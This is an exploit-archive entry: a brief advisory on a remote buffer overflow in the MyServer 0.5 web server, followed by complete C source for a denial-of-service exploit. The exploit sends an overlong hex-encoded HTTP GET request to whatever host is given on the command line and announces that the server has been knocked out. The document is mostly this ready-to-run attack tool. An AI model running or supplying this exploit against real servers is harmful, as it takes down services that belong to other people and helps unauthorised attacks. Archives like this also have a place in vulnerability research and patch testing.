source: http://www.securityfocus.com/bid/7770/info myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length. Although unconfirmed, this vulnerability may be exploited to execute attacker-supplied code with the privileges of the vulnerable web server. /* MyServer 0.5 DoS vendor: http://myserverweb.sourceforge.net coded and discovered by: badpack3t for .:sp research labs:. www.security-protocols.com 11.12.2003 usage: sp-myserv [targetport] (default is 80) */ // #include "stdafx.h" #include #include #pragma comment(lib, "ws2_32.lib") char exploit[] = /* entire request */ "\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e" "\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52" "\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c" "\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a" "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70" "\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d" "\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d" "\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65" "\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67" "\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37" "\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20" "\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36" "\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72" "\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63" "\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" "\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63" "\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20" "\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c" "\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61" "\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f" "\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f" "\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65" "\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d" "\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a" "\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f" "\x0d\x0a"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET mysocket; if (argc < 2) { printf("MyServer 0.5 DoS by badpack3t\r\n \r\n\r\n", argv[0]); printf("Usage:\r\n %s [targetport] (default is 80)\r\n\r\n", argv[0]); printf("www.security-protocols.com\r\n\r\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 80; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); mysocket = socket(AF_INET, SOCK_STREAM, 0); if(mysocket==INVALID_SOCKET) { printf("Socket error!\r\n"); exit(1); } printf("Resolving Hostnames...\n"); if ((pTarget = gethostbyname(target)) == NULL) { printf("Resolve of %s failed\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("Connecting...\n"); if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host.\n"); exit(1); } printf("Connected!...\n"); printf("Sending Payload...\n"); if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) { printf("Error Sending the Exploit Payload\r\n"); closesocket(mysocket); exit(1); } printf("Remote Webserver has been DoS'ed \r\n"); closesocket(mysocket); WSACleanup(); return 0; }